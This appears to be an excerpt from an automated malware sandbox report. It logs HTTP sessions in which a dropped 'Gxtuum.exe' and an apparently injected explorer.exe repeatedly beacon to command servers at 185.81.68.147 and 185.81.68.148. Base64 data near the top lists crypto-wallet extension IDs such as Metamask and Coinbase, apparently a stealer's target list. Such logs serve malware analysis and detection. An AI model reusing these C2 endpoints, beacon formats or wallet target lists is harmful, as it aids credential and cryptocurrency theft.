Dec 13, 2024 01:38:01.525351048 CET	224	IN	Data Raw: 00 62 00 32 00 52 00 69 00 5a 00 57 00 5a 00 6e 00 63 00 47 00 64 00 72 00 62 00 6d 00 35 00 38 00 54 00 57 00 56 00 30 00 59 00 57 00 31 00 68 00 63 00 32 00 73 00 4b 00 59 00 57 00 5a 00 69 00 59 00 32 00 4a 00 71 00 63 00 47 00 4a 00 77 00 5a Data Ascii: b2RiZWZncGdrbm58TWV0YW1hc2sKYWZiY2JqcGJwZmFkbGttaG1jbGhrZWVvZG1hbWNmbGN8TWF0aFdhbGxldApobmZhbmtub2NmZW9mYmRkZ2Np
Dec 13, 2024 01:38:01.525382996 CET	1236	IN	Data Raw: 00 61 00 6d 00 35 00 74 00 61 00 47 00 35 00 6d 00 62 00 6d 00 74 00 6b 00 62 00 6d 00 46 00 68 00 5a 00 48 00 78 00 44 00 62 00 32 00 6c 00 75 00 59 00 6d 00 46 00 7a 00 5a 00 51 00 70 00 6d 00 61 00 47 00 4a 00 76 00 61 00 47 00 6c 00 74 00 59 Data Ascii: am5taG5mbmtkbmFhZHxDb2luYmFzZQpmaGJvaGltYWVsYm9ocGpiYmxkY25nY25hcG5kb2RqcHxCaW5hbmNlQ2hhaW4Kb2RiZnBlZWloZGtiaWhtb3BrYmptb
Dec 13, 2024 01:38:01.525440931 CET	224	IN	Data Raw: 00 35 00 68 00 62 00 6d 00 70 00 74 00 5a 00 47 00 74 00 75 00 61 00 47 00 74 00 70 00 62 00 6d 00 6c 00 6d 00 62 00 6d 00 74 00 6e 00 5a 00 47 00 4e 00 6e 00 5a 00 32 00 4e 00 6d 00 62 00 6d 00 68 00 6b 00 59 00 57 00 46 00 74 00 62 00 57 00 31 Data Ascii: 5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfEd1aWxkV2FsbGV0Cm5rZGRnbmNkamdqZmNkZGFtZmdjbWZubGhjY25pbWlnfFNhdHVybl
Dec 13, 2024 01:38:01.525470972 CET	1236	IN	Data Raw: 00 64 00 68 00 62 00 47 00 78 00 6c 00 64 00 41 00 70 00 6d 00 62 00 6d 00 70 00 6f 00 62 00 57 00 74 00 6f 00 61 00 47 00 31 00 72 00 59 00 6d 00 70 00 72 00 61 00 32 00 46 00 69 00 62 00 6d 00 52 00 6a 00 62 00 6d 00 35 00 76 00 5a 00 32 00 46 Data Ascii: dhbGxldApmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3xSb25pbldhbGxldAphaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHxUZXJyYVN
Dec 13, 2024 01:38:01.525510073 CET	1236	IN	Data Raw: ab 4b 02 e2 72 1f 8f 57 e3 55 ab 2a 66 eb 28 07 b2 b5 c2 03 2f c5 7b 9a 86 37 08 a5 d3 28 87 f2 30 bf a5 b2 23 03 6a ba 02 16 82 5c ed cf 1c 2b 8a 79 b4 92 a7 07 f2 f0 f3 69 e2 a1 4e da f4 cd 65 05 be d5 06 34 62 1f d1 a6 fe 8a c4 2e 53 9d 34 f3 Data Ascii: KrWU*f(/{7(0#j\+yiNe4b.S4U2u9`@q^nQ!>=>FMT]qoP`$@CwgB[8y\|GB\|+H2pZrNl8V=-9'6d\!h[T6.:$gW
Dec 13, 2024 01:38:01.525564909 CET	1236	IN	Data Raw: 00 63 00 65 00 73 00 73 00 20 00 57 00 68 00 65 00 72 00 65 00 20 00 53 00 50 00 72 00 6f 00 63 00 65 00 73 00 73 00 49 00 6e 00 66 00 6f 00 65 00 73 00 73 00 69 00 6f 00 6e 00 49 00 64 00 3d 00 27 00 00 00 00 00 00 00 a5 c6 63 63 84 f8 7c 7c 99 Data Ascii: cess Where SProcessInfoessionId='cc\|\|ww{{kkooTP`00gg}V++bMvvE@}}YYGGAg_E#Srr[u=jL&&Zl66A~??O\h44Q4
Dec 13, 2024 01:38:01.525599003 CET	1236	IN	Data Raw: 55 ad 76 6d f6 88 cc 76 91 f5 02 4c 25 4f e5 d7 fc c5 2a cb d7 26 35 44 80 b5 62 a3 8f de b1 5a 49 25 ba 1b 67 45 ea 0e 98 5d fe c0 e1 c3 2f 75 02 81 4c f0 12 8d 46 97 a3 6b d3 f9 c6 03 8f 5f e7 15 92 9c 95 bf 6d 7a eb 95 52 59 da d4 be 83 2d 58 Data Ascii: UvmvL%O&5DbZI%gE]/uLFk_mzRY-Xt!Ii)DujyxX>k'qO f}:cJ1Q3`bSEdwk+pHhXElR{s#rKWfU(/{70(#j\+yNie
Dec 13, 2024 01:38:01.525634050 CET	1236	IN	Data Raw: f1 71 93 e2 71 d8 73 ab d8 31 53 62 31 15 3f 2a 15 04 0c 08 04 c7 52 95 c7 23 65 46 23 c3 5e 9d c3 18 28 30 18 96 a1 37 96 05 0f 0a 05 9a b5 2f 9a 07 09 0e 07 12 36 24 12 80 9b 1b 80 e2 3d df e2 eb 26 cd eb 27 69 4e 27 b2 cd 7f b2 75 9f ea 75 09 Data Ascii: qqs1Sb1?R#eF#^(07/6$=&'iN'uu,tX,.4-6nnZZ[RR;Mv;a}){R)>/q^/SSh, `@ y[[jjFg9Kr9JJLLXXJkOCCMM3Uf3E
Dec 13, 2024 01:38:01.525670052 CET	1236	IN	Data Raw: 00 62 00 47 00 56 00 30 00 43 00 6d 00 46 00 6c 00 59 00 57 00 4e 00 6f 00 61 00 32 00 35 00 74 00 5a 00 57 00 5a 00 77 00 61 00 47 00 56 00 77 00 59 00 32 00 4e 00 70 00 62 00 32 00 35 00 69 00 62 00 32 00 39 00 6f 00 59 00 32 00 74 00 76 00 62 Data Ascii: bGV0CmFlYWNoa25tZWZwaGVwY2Npb25ib29oY2tvbm9lZW1nfENvaW45OFdhbGxldApjZ2Vlb2RwZmFnamNlZWZpZWZsbWRmcGhwbGtlbmxma3xUb25Dcnlzd
Dec 13, 2024 01:38:01.645591021 CET	1236	IN	Data Raw: 00 5a 00 69 00 59 00 32 00 64 00 6e 00 5a 00 6d 00 70 00 6d 00 62 00 6d 00 31 00 38 00 54 00 57 00 46 00 70 00 59 00 58 00 4a 00 45 00 5a 00 55 00 5a 00 70 00 56 00 32 00 46 00 73 00 62 00 47 00 56 00 30 00 43 00 6d 00 4a 00 6f 00 5a 00 32 00 68 Data Ascii: ZiY2dnZmpmbm18TWFpYXJEZUZpV2FsbGV0CmJoZ2hvYW1hcGNkcGJvaHBoaWdvb29hZGRpbnBrYmFpfEF1dGhlbnRpY2F0b3IKb29ramxia2lpamluaHBtbmp

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.5	49868	185.81.68.147	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:38:00.781603098 CET	278	OUT	POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 13, 2024 01:38:00.901525021 CET	6	OUT	Data Raw: 48 5e 08 51 Data Ascii: H^Q
Dec 13, 2024 01:38:02.216494083 CET	216	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:38:01 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.5	49869	185.81.68.148	80	3408	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:38:00.907602072 CET	158	OUT	POST /8Fvu5jh4DbS/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.148 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 01:38:02.256973982 CET	205	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:38:01 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 8 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 33 3c 64 3e Data Ascii: <c>3<d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.5	49875	185.81.68.147	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:38:02.453355074 CET	278	OUT	POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 13, 2024 01:38:02.574018002 CET	6	OUT	Data Raw: 48 5e 08 51 Data Ascii: H^Q
Dec 13, 2024 01:38:04.077234030 CET	216	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:38:03 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.5	49877	185.81.68.148	80	3408	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:38:03.891496897 CET	312	OUT	POST /8Fvu5jh4DbS/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.148 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 38 32 32 37 41 39 33 32 42 39 42 41 30 34 33 30 46 43 36 46 33 38 45 46 46 39 44 42 38 46 37 38 32 35 39 33 46 42 43 31 38 32 32 38 32 34 42 45 31 30 44 42 36 34 34 34 43 37 38 45 41 45 38 33 43 43 33 33 42 Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B8227A932B9BA0430FC6F38EFF9DB8F782593FBC1822824BE10DB6444C78EAE83CC33B
Dec 13, 2024 01:38:05.257503033 CET	204	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:38:04 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 7 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.5	49883	185.81.68.147	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:38:04.313987017 CET	278	OUT	POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 13, 2024 01:38:04.433845043 CET	6	OUT	Data Raw: 48 5e 08 51 Data Ascii: H^Q
Dec 13, 2024 01:38:05.963036060 CET	216	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:38:04 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.5	49884	185.81.68.147	80	3408	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:38:04.703943014 CET	184	OUT	POST /7vhfjke3/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.147 Content-Length: 32 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 30 30 38 34 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10000840101&unit=246122658369
Dec 13, 2024 01:38:06.049526930 CET	201	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:38:05 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 4 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e Data Ascii: <c>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.5	49885	185.81.68.147	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:38:06.203608990 CET	278	OUT	POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 13, 2024 01:38:06.323438883 CET	6	OUT	Data Raw: 48 5e 08 51 Data Ascii: H^Q
Dec 13, 2024 01:38:07.893572092 CET	216	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:38:06 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.5	49891	185.81.68.148	80	3408	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:38:07.500987053 CET	158	OUT	POST /8Fvu5jh4DbS/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.148 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 01:38:08.865362883 CET	205	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:38:08 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 8 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 33 3c 64 3e Data Ascii: <c>3<d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.5	49892	185.81.68.147	80	3408	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:38:07.797480106 CET	155	OUT	POST /7vhfjke3/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.147 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 01:38:09.163487911 CET	205	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:38:08 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 8 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 33 3c 64 3e Data Ascii: <c>3<d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
70	192.168.2.5	49893	185.81.68.147	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:38:08.134330034 CET	278	OUT	POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 13, 2024 01:38:08.255857944 CET	6	OUT	Data Raw: 48 5e 08 51 Data Ascii: H^Q
Dec 13, 2024 01:38:09.763339043 CET	216	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:38:08 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
71	192.168.2.5	49899	185.81.68.147	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:38:10.000058889 CET	278	OUT	POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 13, 2024 01:38:10.119851112 CET	6	OUT	Data Raw: 48 5e 08 51 Data Ascii: H^Q
Dec 13, 2024 01:38:11.473818064 CET	216	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:38:10 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
72	192.168.2.5	49900	185.81.68.148	80	3408	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:38:10.502433062 CET	312	OUT	POST /8Fvu5jh4DbS/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.148 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 38 32 32 37 41 39 33 32 42 39 42 41 30 34 33 30 46 43 36 46 33 38 45 46 46 39 44 42 38 46 37 38 32 35 39 33 46 42 43 31 38 32 32 38 32 34 42 45 31 30 44 42 36 34 34 34 43 37 38 45 41 45 38 33 43 43 33 33 42 Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B8227A932B9BA0430FC6F38EFF9DB8F782593FBC1822824BE10DB6444C78EAE83CC33B
Dec 13, 2024 01:38:11.875880957 CET	204	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:38:11 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 7 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
73	192.168.2.5	49905	185.81.68.147	80	3408	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:38:10.803453922 CET	309	OUT	POST /7vhfjke3/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.147 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 38 32 32 37 41 39 33 32 42 39 42 41 30 34 33 30 46 43 36 46 33 38 45 46 46 39 44 42 38 46 37 38 32 35 39 33 46 42 43 31 38 32 32 38 32 34 42 45 31 30 44 42 36 34 34 34 43 37 38 45 41 45 38 33 43 43 33 33 42 Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B8227A932B9BA0430FC6F38EFF9DB8F782593FBC1822824BE10DB6444C78EAE83CC33B
Dec 13, 2024 01:38:12.163288116 CET	204	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:38:11 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 7 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
74	192.168.2.5	49906	185.81.68.147	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:38:11.703921080 CET	278	OUT	POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 13, 2024 01:38:11.823878050 CET	6	OUT	Data Raw: 48 5e 08 51 Data Ascii: H^Q
Dec 13, 2024 01:38:13.141201019 CET	216	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:38:12 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
75	192.168.2.5	49912	185.81.68.147	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:38:13.375853062 CET	278	OUT	POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 13, 2024 01:38:13.497446060 CET	6	OUT	Data Raw: 48 5e 08 51 Data Ascii: H^Q
Dec 13, 2024 01:38:14.848855972 CET	216	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:38:14 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
76	192.168.2.5	49913	185.81.68.148	80	3408	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:38:13.627343893 CET	158	OUT	POST /8Fvu5jh4DbS/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.148 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 01:38:14.974706888 CET	205	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:38:14 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 8 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 33 3c 64 3e Data Ascii: <c>3<d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
77	192.168.2.5	49914	185.81.68.147	80	3408	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:38:13.907121897 CET	155	OUT	POST /7vhfjke3/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.147 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 01:38:15.240773916 CET	205	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:38:14 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 8 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 33 3c 64 3e Data Ascii: <c>3<d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
78	192.168.2.5	49919	185.81.68.147	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:38:15.078315020 CET	278	OUT	POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 13, 2024 01:38:15.198101997 CET	6	OUT	Data Raw: 48 5e 08 51 Data Ascii: H^Q
Dec 13, 2024 01:38:16.523161888 CET	216	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:38:15 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
79	192.168.2.5	49922	185.81.68.148	80	3408	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:38:16.637759924 CET	312	OUT	POST /8Fvu5jh4DbS/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.148 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 38 32 32 37 41 39 33 32 42 39 42 41 30 34 33 30 46 43 36 46 33 38 45 46 46 39 44 42 38 46 37 38 32 35 39 33 46 42 43 31 38 32 32 38 32 34 42 45 31 30 44 42 36 34 34 34 43 37 38 45 41 45 38 33 43 43 33 33 42 Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B8227A932B9BA0430FC6F38EFF9DB8F782593FBC1822824BE10DB6444C78EAE83CC33B
Dec 13, 2024 01:38:17.981180906 CET	204	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:38:17 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 7 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
80	192.168.2.5	49923	185.81.68.147	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:38:16.750751972 CET	278	OUT	POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 13, 2024 01:38:16.870537996 CET	6	OUT	Data Raw: 48 5e 08 51 Data Ascii: H^Q
Dec 13, 2024 01:38:18.399305105 CET	216	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:38:17 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
81	192.168.2.5	49924	185.81.68.147	80	3408	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:38:16.894428015 CET	309	OUT	POST /7vhfjke3/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.147 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 38 32 32 37 41 39 33 32 42 39 42 41 30 34 33 30 46 43 36 46 33 38 45 46 46 39 44 42 38 46 37 38 32 35 39 33 46 42 43 31 38 32 32 38 32 34 42 45 31 30 44 42 36 34 34 34 43 37 38 45 41 45 38 33 43 43 33 33 42 Data Ascii: 